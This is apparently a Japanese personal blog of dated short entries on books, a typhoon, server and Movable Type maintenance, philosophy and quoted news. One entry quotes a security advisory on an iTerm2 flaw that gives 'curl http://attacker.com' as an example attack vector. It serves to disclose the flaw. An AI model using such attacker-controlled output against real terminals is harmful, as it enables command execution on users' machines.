2019-10-12昨日、フレックス・タイム制を使って早めに会社を退出した。その帰りに船場センタービルの地下を通って、堺筋に出ると一階へ上がり、『槇尾古書店』という古本屋へ立ち寄った。本棚が整理しなおされていて、文庫や新書の棚が置かれた部屋と単行本が置かれた棚が入れ違いに別の部屋へ移っている。見た目は文庫の冊数が増えたように見えるし、新書はなぜか殆どが岩波新書のしかも新赤版ばかりだ。その代わり、かなり新しい本でも200円で売っていて、アマゾンで1円+送料という売り方の新書よりも安い。また、文庫も大半が岩波文庫なのだが、意外にも『清沢満之集』が300円で手に入った。これはアマゾンでは送料を含めると2,000円くらいのプレミア価格になっていたもので、買い控えていたものだ。この他にも興味深い本が何冊かあって、そのうち買おうと思う。あと、吉川幸次郎氏の『阮籍の「詠懐詩」について』という薄い本を見つけて、「廃頓」(深い悲しみや失望でうなだれること)という言葉を知った。自宅にある中型の国語辞典や漢和辞典にはない言葉だ。

2019-10-12昨日の遅くから雨が降り出して、ただいま朝の8時前だが夜のあいだはよく降り続いていた。大阪はこれから夕方にかけて台風の最も強い強風域が通過するらしく、以前の強風を伴った台風のように、外をトタン板のようなものが舞い上がるほどの影響があるかもしれない。だいたい、その時に強風で曲がったであろうバス停のルーフ(r型の屋根)が直っていないところも多いというのに、もっと曲がったらさすがにルーフの用を為さなくなるだろう。また、以前の台風では公園の木も多くが折れたので、途中から幹や枝を裁断しているところが多かった。その大半は再び枝や葉を付けているのだが、中には被害が酷すぎて根元から引き抜いて除去された木もあったし、いまだに発育が良くない木も見かける。大阪の中心部では、影響と言ってもこれくらいなのだが、実家では父親が古い家の窓を内側から板で補強したり、それなりに準備をしている。

2019-10-12もともと土地を持っていたからこそできるんだろうなぁ。もう全国規模でも知られていると思うけれど、大阪の IT 事業者やウェブ制作の人間で、パソコンや機材を日本橋へ買いに行く人は殆どいなくなった。そんな店は無くなってしまったからだ。日本橋はアニメ・グッズとアダルト・ビデオと観光客向けの電化製品を扱う街になり、まだわずかにハムやオーディオの部品を扱う店はあるが、わざわざ足を運ぶほどの規模でもない。いまどきは梅田のヨドバシや通販で十分だ。そもそも、ジョーシンとかに入っても照明が暗いし、建物の内装も1980年代で止まっているような印象がある。気の毒なほどの様子で、僕が中学生の頃にワクワクして足を運んだ街は消えてしまった。簡単に言えば、デジタル性風俗街である。NTT Com「大阪第6データセンター」新日本橋ビル(仮称)新築工事は、NTT西日本が、大阪市浪速区日本橋5丁目に計画している高層ビルです。NTT Com「大阪第6データセンター」新日本橋ビル(仮称)新築工事の状況 19.10

2019-10-12日本では全く話題になっていなかった和平交渉に寄与した人物だからこそ、この決定をきっかけとして何十年にも渡って続いていた紛争が知られるようになることが望ましいと思う。正直、日本では「もしグレタさんが受賞したら最年少になり云々」とか、まるっきりワイドショー番組の視点でしか扱っていなかったから、東アジアの辺境地域で刹那的に生きる民族には、よい冷水を浴びせたことにもなろう。正直、ノベール賞は業績に対して授与するものだ。いくら国連でスピーチしようと、訴える以外の具体的で明白な業績がない子供に与えるほど安っぽいものでもなかろう。The Norwegian Nobel Committee has decided to award the Nobel Peace Prize for 2019 to Ethiopian Prime Minister Abiy Ahmed Ali for his efforts to achieve peace and international cooperation, and in particular for his decisive initiative to resolve the border conflict with neighbouring Eritrea. The prize is also meant to recognise all the stakeholders working for peace and reconciliation in Ethiopia and in the East and Northeast African regions.The Nobel Peace Prize 2019

2019-10-11YouTube でアップロードされている『BSマンガ夜話』をときどき観るのだが、昨日も『北斗の拳』を取り上げた回を観て、夜中の1時頃に大声でゲラゲラと笑ってしまった。やはり笑うのは気持ちが良い。

2019-10-11誰かも書いてたけど、最近は「~って?」とか「~を調べてみた」などというタイトルで山のようにブログ記事が書かれていて、その大半は「調べてみました。結論:現在調査中」とか「口コミを検索してみたら、わからなかった」とか、検索してみたという行為の記録が書いてあるだけという記事が大半を占める。もちろん、こういう内容なら具体的な事実がわからなくても、自分が何かをしたという自分についての事実さえ書けばいいだけなので、それこそ訓練すれば幼稚園児でも書ける。というか、幼稚園児の絵日記以下だ。恐らくは既に機械学習を応用してニューズ・サイトや SNS などから検索するべきキーワードと検索結果だけを拾い上げて記事を自動出力するプログラムを使っている「メディア」もあると思う。こうした下らない「情報」に左右されないようにするには、SNS などで話題になるようなことは、実際のところ政治だろうと経済だろうと科学や文化だろうと、どうでもよいことだと割り切ればいい。こういうことを血眼になってフォロー・アップしている人々につきあう社交上の必要さえなければ、こんなものを無視して仕事と自分の趣味だけに没頭していても人生は豊かに暮らせる。もし時世の話題を何か知っておこうというのであれば、たとえば『現代用語の基礎知識』でも買って読めばいいかもしれないし(昔は『日本の論点』を買っていたが、薄っぺらい煽り記事ばかりになってやめた。あんなもん筆者各人のブログ記事で十分だ)、岩波新書や平凡社新書でも手に取ればいい。

2019-10-11今日は、本町の『福島上等カレー』でミンチカツのカレーをいただいた。柔らかくて、これいいな。これまで普通のカツカレーばかり食べていたが、今度からはミンチカツにしよう。なお、本町まで行く途中に、平野町の『楽山』の隣で再び『得正×福島上等カレーBR』がオープンしているのを見かけた。リベンジか?

2019-10-11もともと大半のプログラマやコーダの頭に "software life cycle" なんて概念はない。自分たちがどれだけクールなことをやってると思っていても、所詮は新聞やテレビで公開したら事後処理は広報や法務にでも投げている広告屋と同じだ。イベント会社ですら後片付けくらいはやるのに、ウェブのアプリケーション開発だと、作った連中はサーバ管理者に投げて次のおもちゃを探すだけである。当然、アプリケーションやサーバのメンテナンスなんてフェイズは自分たちと関係がないし、そんな予算も割り当てられていない。そして、幸か不幸か、そのまま放置してもシステムは動く。http://themaintainers.org/blog/2019/7/30/why-do-people-neglect-maintenance

2019-10-11某社のクーポン管理システムをホストしている(まだ一度も使われていない)ウェブ・サーバにアクセスすると、SSLサーバ証明書の期限切れというエラーが出てブラウザが止まってしまう・・・これ crontab で更新してる筈なのに。サーバに入って /certbot renew すると、確かに有効期限は12月の中頃なのだが、ブラウザで証明書のプロパティを確認すると10月9日が期限になっている。おかしなことだ。とりあえず # certbot renew --force-renew で強制的に証明書を更新してから httpd -k restart をかけてエラーはなくなったが、この期限のズレはなんなのか。偽物の証明書で上書きされるような脆弱性があるかもしれないという心配はいちおうしておく。ちなみに、crotab の設定は "00 03 * * * /usr/bin/certbot renew --deploy-hook "httpd -k graceful" 2>&1 | sendmail MYEMAILADDRESS" であり、毎日3時には "Oct 11 03:00:01 FOOBAR CROND[13625]: (root) CMD (/usr/bin/certbot renew --deploy-hook "httpd -k graceful" 2>&1 | sendmail MYEMAILADDRESS)" と動作は正しく行っている。

2019-10-11分量の話かと思ったら語彙の話だという。もちろん、式さえクリアに書いていれば話が通じるというものでないのは、数学者こそ最もよくわかっているはずなのだがね。There has also, the authors say, been an increase in “general scientific jargon”: that is, multisyllable words that have non-technical meanings but have become part of the standard lexicon of the science paper. These words include ‘robust’, ‘significant’, ‘furthermore’ and ‘underlying’ — all familiar enough in daily use, but markedly more prevalent in the scientific literature. The words aren’t inherently opaque, but their accumulation adds to the mental effort involved in reading the text.It's not just you: science papers are getting harder to read

2019-10-11このところ人が減っていて、僕がバック・オフィス部門の集まっている部屋で電話番をすることも多くなってきた。プロフィット部門の販売管理を担当するバック・オフィス系の部署は他にあるのだが、プロフィット部門の営業などと連絡がしやすいように、プロフィット部門と同じ場所で仕事をしていて、そういう人たちは会社の代表番号にかかる電話には対応しない。まぁ、そちらは利用料金の催促とかアウト・バウンドにも従事するので、自分たちの方から電話をかけることが多く、確かに無関係な営業電話を始めとして電話にばかり関わってはいられないという事情もあろう。ただ、人数が減ってくれば代表の番号には他の部門も出てくれるようにしないと困る。これはどこの会社でも課題だろうとは思うが、バック・オフィスは会社のマネジメントの軸を担っており、お茶出しを始めとするような雑用係ではないのだ。

2019-10-11"What Is It Like to Be a Philosopher?" というコンテンツは知識社会学のようなアプローチの《材料》としては興味深いのだろうけれど、果たして大学で哲学を教えてたり論文を書いてたり勉強してる人たちの自意識だけで「哲学」ましてや「哲学者」だとか哲学するということについて語りうるのかどうかは、考えてみてもよいのだろう。もちろん、例の独立研究者からアマチュアまでを含めた人々のやっていることも、(あからさまに外延として含まなくても)内包の解釈として包含することを期待するなんてスケベ根性から言ってるわけではない。雑な議論でいいなら、もちろんローティが言ったように、大学の哲学科でやっていることが大文字の哲学であると言ってもいいだろうし、それが「アカデミックな」ものを意図しているのであれば、なおさら反論する必要もなかろう。僕は他人に説明する必要から「哲学」という言葉を使ったり、その言葉に類する成果や先人らに言及するわけだが、そういうことが全く社会学的な必要からやっているだけだということは、殆ど自明のように思う。そもそも哲学をやっている者にとっては、そういう自意識など不要だからだ。つまり、自分が哲学をしているのかどうかなどということをどうして気にする必要があるのか。

2019-10-11pkg コマンドで rust を入れると rustup が入らない。なので、いったん pkg remove してから、ただいま公式サイトから直に落とした rustup-init を実行しているところで・・・終わった(stable installed - rustc 1.38.0 (625451e37 2019-09-23)。ただ、パスが通っていないようなので、.cshrc に実行可能ファイルがあるディレクトリへのパスを追加するのだが、rustup-init でインストールしたら rustup や rustc は %HOME/.cargo/bin に入るため、root で作業してると、もちろん /root/.cargo/bin に入るようだ。なんか変な仕様だな。ユーザごとに違うバージョンを使うという前提なんだろうか。いずれにしても、set path = () にパスを追加して終わり。

2019-10-11バラエティと言えば、僕の歩いている経路だけの話かもしれないが、これだけ数多くの自動販売機が街中にあるというのに、どこもかしこも同じものしか置いてないように見えるんだよね。コーヒーか、スポーツドリンクか、最近流行のヘタレ炭酸の三種類、しかもコカ・コーラ系とキリン系の自動販売機が圧倒的に多くて、これも共産圏(共産圏にこんな自動販売機はなかったろうけど)みたいだ。今日の朝は NHK ニューズで「社会主義がアメリカの若者に支持され始めている」なんて報道してたけど、支持どころか実質的に生産手段を官僚がコントロールしてる《見た目だけの自由主義や民主主義》にすぎない、巧妙な社会主義国家であるジャパンとかいう国の話を無視してもらっては困るね。あと、戦前・戦中は軍が政策をコントロールしてたわけだけど、上層部はまさに官僚と言っていい。いまの文民である官僚にしても、どのみち選挙で選ばれたわけじゃない。江戸時代も結局は武士の上層部である大名が統制していたわけなので、要するに江戸時代からこのかた日本は官僚社会主義なのである(これに貴族も含めていいなら、歴史時代は全てということになる)。明治「維新」なんてクソみたいなものだ。あれを「革命」かどうかと議論していたマルクス主義者や歴史家がいたわけだけど、いかにそういう人たち自身が官僚的な視点で国を見ていたかが分かろうというものだ。

2019-10-11このところ再編によってコンビニエンス・ストアのバラエティが無くなってつまらない。どこに入っても同じような商品しかなくて、これでは共産主義時代の東欧みたいだ。そもそもコンビニエンス・ストアの業態からして、スーパーのような品揃えが難しいのだから、店舗が幾つあっても同じなんだよね。同じものをどこでも買えるというのは、確かに利点もあるとは思うけれど、しかしスーパーに比べて高い商品をどこでも買うというのは、結果的に消費者は損をしているのだ。ともかく、セブン-イレブンとファミリーマートはもういいよ。ミニストップやローソンやヤマザキももう少し増えた方がいい。国内コンビニは、人手不足や人件費上昇など経営環境が厳しくなっている。このため、加盟店が本部に支払うロイヤルティーを引き下げ、加盟店の収益を支援することを決めた。加盟店1店あたりの利益は年間で平均約50万円改善する一方、本部利益には約100億円のマイナスの影響が出る。セブン&アイ、コンビニ1000店舗閉鎖・移転 グループで3000人削減

2019-10-10ぜんぜん分からない。いまどきテレビ番組を同時録画してまで見逃さずに過ごして、いったい何の意味があるのか。それとも、昨今は話題の番組について会話できないと、大人でも虐められたり、あるいは田舎の PTA やマンションの主婦グループみたいなしょーもないコミュニティから排除されるんだろうか。このチューナーは2ちゃんねる創設者のひろゆき氏が取締役を務める未来検索ブラジルが企画したもの。プロジェクトページは6月30日以降更新されていないが、「MiyouTunerを製造する予定だった工場が大幅な値上げを伝えてきたため、支援いただいた金額で製品をお届けできなくなった」という。ひろゆき氏がPRしていたテレビチューナーボードのクラウドファンディング、中止に | スラド ハードウェア

2019-10-10ミラニー・ミッチェルの『ガイドツアー 複雑系の世界: サンタフェ研究所講義ノートから』は名著だと思うけれど、いまのところ複雑系で目覚ましい業績が上がったという話を聞かないのはなぜだろうか。理論としても、何かエキサイティングな議論を呼び起こすような提案がないように見える。これは雑感にすぎないが、見た目として複雑怪奇な事象を《それよりはちょっとマシな》複雑さとか単純な理屈で説明したり分析できるというだけでは、他の事例にまで応用できる保証がない。やはり理論的なインパクトというものは、従来の高度に洗練された理論をも説明してしまう(何らかの特殊な条件が当てはまるときにだけ成立するアノマリーとして包摂する)ようなものでないと、説得力が弱いのではないか。

2019-10-10歩道のバリア・フリーについて調べている人たちなら既に話題としている筈だが、歩道に植えてある街路樹の位置が歩道の端から中心に相当な幅で寄っている場合がある。後で写真と共に「歩行論ノート」へ掲載しておこう。さきほど天満橋から南下するときに通った上町筋という道で、大阪府庁の前にある歩道の街路樹が太くて、しかも植えてある位置が歩道の中心に寄っているため、歩道の半分くらいが通れなくなっている。恐らくは大阪府庁を襲撃するような手合いが逃げ辛いようにとか、大阪府庁の前をデモ隊が通りにくいようにとか、そういう意図はあるのだろうけれど、とにかく不合理な設計の歩道であり、まるで千日前の歓楽街を歩いているようだ。#歩行論

2019-10-10会社で投稿すると、ローカルに保存した messages のテキスト・ファイルが自宅では Google Drive の同期が終わってからしか存在しないため、自宅ですぐに messages を見直そうとして編集画面を出したら、会社で投稿した記事が出てなくて少し待っていないといけない。長い文だが、何を言いたいかは分かる人にだけ分かればいい・・・ああ、次の投稿が終わってページを更新したら、会社で書いた記事が出てきた。

2019-10-10僕も多くの(やっかみだけで書いてる人はともかくとして)人と同じく、いったいこれの何がニューズになるのか不思議だ。自己実現だのスキルを向上するだの社会貢献だのという目先の、しかし自分で基準が分からないから、目先なのに追い続ける人がハマるようにうまく調整された出版物やセミナーに騙されるような人が多いよりも健全だと思うね。というか、金のために働くからこそ、クソみたいな給料にちゃんと腹を立てて messages などというところであれこれ書いたりだな、クソみたいな待遇で求人してる会社の募集要項を堂々と言葉で殴り倒せるわけだよ。大学生の諸君は、内定辞退率がどうこうなんてクソ食らえと言えるくらいでないといけない。転職サイトdodaとオリコンリサーチ社が20~30代を対象に行ったアンケート調査によると、回答者1000人のうち56.3%が働く理由について「生きていくため」と答えたそうだ。20~30代の8割以上が働く理由として「お金のため」と答える | スラド

2019-10-10Movable Type のカテゴリー追加作業は、さきほど HTML をもらったので 15 分くらいで完了した。ブログのホーム・ディレクトリよりも上の階層で表示するのに読み込んでもらうページを出力するので、呼び出す側のファイル(PHP として動く HTML ファイルになっていて、実質 require_once の一行しか書いてない)を上の階層へアップロードしてもらわないと、今回のプロジェクトは完結しない。よって、お客さんの対応が終わるまでテンプレートは「非公開」のステータスにしておく。(先に何か記事を公開するかもしれないので。)こういう変な階層の使い方も、来年に予定しているフル・スケールのリニューアルで MT も最新にするときに何とかしたいものだ。

2019-10-10まぁそうだよね。あと、ハンバーガー・メニューに初めて接したとき、そもそも UI に見えなかったんだよね。変なあしらい画像だなぁと思ったくらいで、それがタップするものだとは思えなかった。Someone who grew up using computers with floppy disks will most likely automatically know what a floppy disk is and recognize that a floppy disk icon means “save.” However, for those who began to use computers in the 21st century and who never saw a floppy disk, the floppy disk save icon may look like a mobile phone SIM card with a rectangular and circular hole and a missing corner. Those users may not understand the meaning of the floppy disk save icon.https://medium.com/google-design/the-obvious-ui-is-often-the-best-ui-7a25597d79fd

2019-10-10なるほど。面白いけど、これって要するに「地熱発電」じゃないのか。That second kind of solar panel is the one that inspired a team of researchers at Stanford University in Palo Alto, California to develop a new system that can harness energy in darkness. It’s based on the concept of using heat to generate energy but an inverse version of the solar panel. While the solar panel uses the heat difference between the sun and Earth with the Earth being the cooler side – their system makes use of the heat difference between the coolness of the night atmosphere and the Earth with the Earth being the hotter side.The Anti-Solar Panel - A Device That Generates Electricity From Darkness

2019-10-10iTerm2 という MacOS 用のターミナル・エミュレータ(Windows で言う TeraTerm Pro や ConEmu や PuTTY)には、少なくとも7年にわたって発見されなかった致命的な脆弱性があるらしい。これまで生半可な知識や経験の人に限って「Mac にセキュリティ・ソフトは必要ない」などと豪語していたわけだが、セキュリティ・ソフトをウイルス対策のプログラムだと思い込んでる人がいるんだよね。でも、こういうことにも備えて不審な通信を遮断する可能性(セキュリティ・ソフトにできるという保証はない)を考慮してもらいたいと思う。During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit

2019-10-10なるほどね。チェスの記譜なのか。これもソーシャル・ハッキングとしてはありうるオプションだろうけど、"../../" なんてバカなフレーズに比べたらマシと言うべきか。しかし当時は、何と言っても8桁以内だからなぁ。This is a chess move in descriptive notation, and the beginning of many common openings. It fits very well to Ken Thompson’s background in computer chess.https://leahneukirchen.org/blog/archive/2019/10/ken-thompson-s-unix-password.html

2019-10-10MT の件、アーカイブのマッピングを設定するときに、同じ種類のマッピング(「記事」とか)を定義したら、その右に出てくるチェックボックスが有効になっているものが優先されて、<$MTEntryPermalink$> の出力ディレクトリになるようだ。新しく「記事」のテンプレートを作ってマッピングしたときに、どうやらこのチェックボックスを、マッピングのパスを変更したときに有効にする対象を指定するためのチェックボックスだと誤解して有効にしてしまったらしい(複数のマッピングが定義できることを知っていたので、一個しか定義してないのにチェックボックスで指定するのはおかしいと思ったが)。そういうわけで、このチェックボックスを所定のテンプレートに固定しておけば、アーカイブを出力したときに表示される URL も固定できる。

2019-10-10Movable Type での作業は少し奇妙な結果が出ているので、原因をはっきりさせるよう調査を始めている。テンプレートの種類として「アーカイブ」のページを出力するテンプレートがある。これは条件を決めて複数のページを出力するものであり、ブログ記事を個別に HTML ファイルとして /news/entry/2019-10-10-001.html のように出力するとか、記事のアーカイブ・ページを /news/archive/2019-10.html のように出力する。カテゴリーごとに、出力するディレクトリを分けたいという事情があったので、「受賞歴」というカテゴリーの記事だけ /news/awards/ というディレクトリの下へ HTML ファイルを出力し、それ以外は /news/entry/ というディレクトリの下へ HTML ファイルを主力していた。そして、このほど新しく二つのカテゴリーを追加するので、/news/essay/ と /news/radio/ という二つのディレクトリをカテゴリーごとに設定した。すると、記事全体のアーカイブにあたる HTML ファイルの URL が、/news/entry/ ではなく、/news/radio/ に変わってしまい、そしてなぜか、他のカテゴリーに該当する記事は /news/radio/ 以下に HTML ファイルとして出力されていないから 404 エラーとなってしまう。これはどうしたものか。そもそも、アーカイブテンプレートというものは全ての記事に適用されるので、カテゴリーと関係なく全ての記事が出力されるのが Movable Type の動作仕様ではなかったのか。

2019-10-10DHS の下にできた CISA の文書一覧だ。NIST の文書と同様に参考になるものもあるが、"Removal of Kaspersky-branded Products" のような、まぁそれなりに理由はあるだろうけど、アメリカ製も似たようなもんだろと言いたくなるような文書もある。cyber.dhs.gov - Cybersecurity Directives

2019-10-10冒頭に "Cybersecurity Act" の短い解説や翻訳にあたっての但し書きもある。国内では情報セキュリティに関する専門的な論文の大半がクローズドな専門誌(しかも中小企業の実務家が簡単には入会できない資格保有者の団体とか都内の事実上は IT ベンダーと官僚の茶飲みクラブとか)にしか掲載されないので、こういうのは非常にありがたい。この参考訳・改訂版の冒頭部分に明記してあるとおり,翻訳の大前提となる法解釈等は現時点におけるものであり,今後の研究の進展に伴い,将来,何らかの改訂が加えられる可能性がある。後に誤記や誤訳等が発見された場合も同様である。それゆえ,この参考訳・改訂版を利用する場合には,各自の責任において行い,かつ,必ず原文にあたって検討することを要する。無思慮にコピーして利用した場合の責任は,全てその利用者自身にある。規則(EU) 2019/881(Cybersecurity Act)の参考訳・改訂版をWeb公開 - Cyberlaw

2019-10-10ダイバーシティや男女平等という話になると、すぐにこういう男女比率のグラフを出してくるわけだけど、それがどうしたの? フェミニストだろうと LGBTQ だろうと、哲学科の大学院生なら、せめてこういうグラフが何を示していて、このグラフをどう理解すればダイバーシティについて何の判断ができるのかくらい、考えたらどうなんだろうね。(実際、この後に続く文章を読むと、グラフと殆ど関係のない、社会学の本を読めば書いてあるような話をしている。)たとえば比率が正確に 50:50 になってないと《いけない》のか、あるいはこれまでの経緯に対する《復讐》として女性の方が比率として多くなれば良いのか。僕らのような哲学者として答えなくてもいいし、院生だからって哲学者とは限らない単なる学生だから答えられる才能があるとも限らないから構わないけど、せめて院生レベルの意見はクリアに書いてもらいたい。あと、これは科学哲学でも言えるけど、割と定式化の数式とか論理式だけ並べて、それが何なのかという話を書かない人がいるんだよね。そういうこけおどしのために論理学や物理学や数学をやるのって、本当に欺瞞的なことだと思う。僕が科学哲学をやってるのは、僕自身がそういうスノッブに騙されないようにするためでもあるんだ。Graduate Students on Diversity and Inclusivity in Philosophy

2019-10-10もちろん、これは正しい。そして、その「正しさ」を語るための基準として何らかの《実証》という概念が想定されているという事実も正しい。よって、この手の賭けは《実証》の重みが数学でこしらえた玩具よりも圧倒的な価値を保っている限り、いつ誰とやっても《実証》を重視して選択する側が勝つのだ。恐らく、こういう話を気軽な逸話として科学哲学の教科書に盛り込むこともできるだろう。ただし、もちろん STS や科学史のような知見を十分に取り入れてから《書く》べきであって、気軽な話題だからといって書き手が気軽に書いてたら、それはおまえたちバカだろうという話でしかない。日本で教科書を書く多くのプロパーが容易く陥るのは、こういう出版業界にいたら当たり前に気づくことに気づかないということなのだ。もちろん、編集者も一緒になって学者ぶった態度でものを作ろうとするバカだからなんだろうけど。I just won a bet I made in 2002 with physicist Michio Kaku. I bet him $1,000 that “by 2020, no one will have won a Nobel Prize for work on superstring theory, membrane theory, or some other unified theory describing all the forces of nature.”String Theory Does Not Win a Nobel, and I Win a Bet

2019-10-10色々な部署の人間に同じようなことを何度も話すという無駄をやり続けるのは、サラリーマンとして責任を拡散させたいというアリバイ工作や、何かあったときの退路の構築としては妥当な選択だ。凡人の知恵としてはなかなか良く考えた末の習慣だろう。しかし、そんな人間はベンチャー企業には必要ない。大手のベンチャー企業が失速するのは、要するにこの手の「サラリーマン」どもが増えすぎるからだ。Yahoo! JAPAN や楽天を始めとする大手の企業を見れば、誰でも分かる。二流の役人みたいな連中が、技術者にすらたくさんいるだろう。喋る言葉を英語にしたくらいで、こんなことが解決するわけがない。なぜなら、こういう「サラリーマン」は世界中に、それこそインド人だろうとハンガリー人だろうと、あるいはスタンフォードや UCLA の博士号を持ってるアメリカ人だろうと、凡人である以上はどこの国でも大半の人間がそうだからだ。Why many Japanese companies like us love taking a long time of meeting without a clear plan in 3 or 4 hours so much? It appears that a division have taken such meetings in a week and they have also made nearly the same talks for another members. I know, the problem of low productivity in Japan will never be a matter of technology or knowledge, but a matter of management with a clear responsibility and strict policy for the administration in each division.#here

2019-10-10もう何年前からだろうか、自衛隊の出身者を斡旋する人材派遣業者からの営業メールが定期的に届く。「谷口」と名乗る人物が担当のようだ。ネット・ベンチャーで、しかも弊社のように育成するなんて余裕もスキームも存在しないため即戦力が必要な会社では、つまるところオンライン・ビジネスやウェブ・コンテンツ制作の素養や経験がないと採用することは難しい。更に、元自衛隊の出身者でサイバーセキュリティの担当者であれば、個人的には部下として採用したいとは思うのだが、残念ながら関西でウェブの制作会社が受注する大手広告代理店案件など、僕が片手間にやってるだけでもオーバースペックなくらいの与件しかない。とは言え、一つだけ過去に某証券会社のシステム構築という難しい案件でサイバーエージェントとプレゼンに行ったことはあるが、もちろんウェブの制作会社にそんな事案を任せる証券会社があるわけない。そもそもそのN藤証券という会社は自社にガチガチの情報システム部署があって、プレゼンの場ですぐに「おまえらがやればいいだろう、ていうか作っても仕様策定のフェイズで関与しないくせに、お前らの検収段階で勝手に後から仕様をあれこれ変更するんだろ?」と思った。ベンダーとの競合だったし、十中八九は当て馬の一つだったのだろう。

2019-10-09「読破」なぁ。こんなことをアピールしてる学者なんて、日本にしかいないよなぁ。英語が好きなのはわかったから、英語で書いて業績を出しなよ。本当にこういうのを見てると、哲学に限らず日本のプロパーというのは発育が良くないブロイラーみたいなものだね。食うだけ食って、卵を落とさずに死んでいく。何を考えて言っていようと、制度化された教育システムや学術研究においては、プロパーは入力に対する出力が問われる。もちろん僕らサラリーマンもそうだが、しょせん凡庸な階級なり資産の家に暮らす成人として食い扶持をもらっている以上は、そういう事実上のメカニズムの《末端機構》であることを免れられるものではない。本分野の最先端を幅広く把握するために、SOUPS以外の国際会議も広く対象会議とし、SOUPS論文読破会を発展させたイベントとしてユーザブルセキュリティ・プライバシー論文読破会が開始されました。 本読破会では、参加者同士で協力して発表論文を読破し、内容を紹介することで参加者が本分野の最先端論文を網羅的に把握することを目指します。 また最先端研究を知ることを通してSPT研究会が対象とする分野の国内研究の底上げを図ります。https://www.iwsec.org/spt/uspread3.html

2019-10-09こういう発表は増えてほしいと思うのだが、この発表に限って言えば期待外れの結論だ。"Our interviews suggest that users of built-in password managers may be driven more by convenience, while users of separately installed tools appear more driven by security." 問題は、どうしてそれらの選択の違いが起きるかだよ。Security experts often recommend using password-management tools that both store passwords and generate random passwords. However, research indicates that only a small fraction of users use password managers with password generators. Past studies have explored factors in the adoption of password managers using surveys and online store reviews. Here we describe a semi-structured interview study with 30 participants that allows us to provide a more comprehensive picture of the mindsets underlying adoption and effective use of password managers and password-generation features. Our participants include users who use no password-specific tools at all, those who use password managers built into browsers or operating systems, and those who use separately installed password managers. Furthermore, past field data has indicated that users of built-in, browser-based password managers more often use weak and reused passwords than users of separate password managers that have password generation available by default. Our interviews suggest that users of built-in password managers may be driven more by convenience, while users of separately installed tools appear more driven by security. We advocate tailored designs for these two mentalities and provide actionable suggestions to induce effective password manager usage.https://www.usenix.org/conference/soups2019/presentation/pearman

2019-10-09日本で翻訳される政治や評論の本で圧倒的に少ないのは、いわゆる説教師をはじめとするクリスチャンが書いた本だ。はっきり言うと日本人の大半はキリスト教なんて何の興味もないし、それどころか仏教や神道にすら興味なんてないわけだから、例えば Dinesh D'Souza のような人たちが死後の世界の実在を論証するなんて本を出したところで、そんなもんの翻訳を読む気はないだろう。

2019-10-09Amazon とマスターを組み合わせたカードって、年会費が割引後でも4,400円するのか。普通なら1万円を超えるって、こんなのカードを持ってるだけで毎年お金がどんどん出ていくのは、やっぱり利便性に比べたらもったいない。50歳になるまでカードがなくても何の支障もなかったし、やっぱりクレジット・カードは必要ないね。デビット・カードも、結局は使わずに二年くらいで解約したし、キャッシュレスってポイント還元で得なのは分かるけど、年会費や決済フィーでどっちみち《胴元》に取り返されてしまうのではないかな。

2019-10-09ZF3 の解説は Amazon の自費出版ならぬ自動出版(Createspace Independent Pub)ならある。ただ、或るところで PDF を手に入れて眺めた限りでは、ZF2 までの運用経験がある人に向けて書かれたマイグレーション用途の本であり、ZF や PHP の初心者が読んで分かるようなものではない。使ったことがあれば、"ZF initially created by Zend Technologies consists of, among others, components like: Zend Form to generate and handle forms, Zend Session to control user’s sessions or Zend DB to communicate with different data bases. Each component handles a separate code folder so we can easily embed single components into our applications without the need for embedding and using the whole framework." というストレートな説明は、「ああ、わかってるよ」という感じで腑に落ちるだろう。それにしても、僕のように版下作成を手作業でやっていた(例えば電算写植の活字セットに無い特殊な漢字は、個々に部首を印刷してから版下用紙に切り貼りしていた)ような最後の世代からすれば、いくら素人だとは言え雑な版下編集だよなぁ。

2019-10-09そういや、Zend Framework って最新版は 3.0 だけど、これは2016年のリリースだから3年も前のものがメジャー・アップデートもされずに公開されているんだな。もちろん、ZF はコンポーネントのアップデートが主流だろうから、ZF 全体のアップデートという考えがさほど強くないのかもしれない。1.0 から 2.0 への交代も時間がかかってたし。ただ、動作原理が 2.0 と変わらないならいいのだけれど、3.0 の本が洋書も含めて全く出ていないので、オンラインのチュートリアルだけでは辛いものがある。かといって、下記のようなスクレイピングを使った自動翻訳のコピペ・サイトではクソの役にも立たない。だいたい、2019年の日付を付けた記事で「最近zendはZF3をリリースしましたが」とか、何を言ってるのって感じがするな。体裁からして StackOverflow の2016年の記事をコピペしたんだろう。(PHP7 について書いているが、PHP 7.0 は2015年には既にリリースされている。)ZendによってアーキテクチャがどれだけVer 1から3に変更されたのかを説明してください。最近zendはZF3をリリースしましたが、zf1からzf3に移行する方法を提供する情報はありません。私はzf1で開発されたアプリケーションを持っていて、今それをZF3でPHP 7のパワーを使うようにアップグレードすることを探しています。コード全体を書き直す必要があるのでしょうか、それともどのくらいの努力で最新バージョンに移行する必要があるのでしょうか。https://codeday.me/jp/qa/20190601/916771.html

2019-10-09さきほど整理した段ボール箱から、Scala の本が出てきた。どういう事情で買ったのかは分からないが、習得してないし読んでもいない。JRE の上でしか動かない事実上のマクロ言語を、Java と無関係に仕事をしている人間がわざわざ覚える必要はないと思う。The Guardian のサイトで知られているように、Java を書くのが難しいという人が使えたらいいだろう。

2019-10-09いまでは個人を特定するノウハウも色々とある。他に、自宅で撮影した何枚かの写真で部屋の間取りを推定されてマンションを特定されるとか、よく考えていると思う。もちろん技術は技術なので、こうして犯罪に使われたり、安っぽい正義感で容疑者の実名を特定するような行為にも使われる。ここ数日だと、神戸の東須磨小学校で同僚を集団で「いじめ」ていた教員を特定する作業が進んでいて、おおよそ四人とも特定されたようだ。しかも、その四人が「いじめ対策」の担当だったというから笑えない。正直、これらの人々が個人として特定されまいと学校では分かってるわけだから、この四人の行く末は決まっているし、情報はすぐに共有されるため、医療業界と同じで別の小学校に就職するなんて殆ど不可能だ。それに、被害を受けた教員が届を出せば刑事の事案となるので、自動的に実名は国家の記録に残る。A man who attacked a woman working as a so-called idol reportedly located her home by using an image reflected in her eyes in a photo on social media.Attacker pinpointed victim's home from eye image | NHK WORLD-JAPAN News

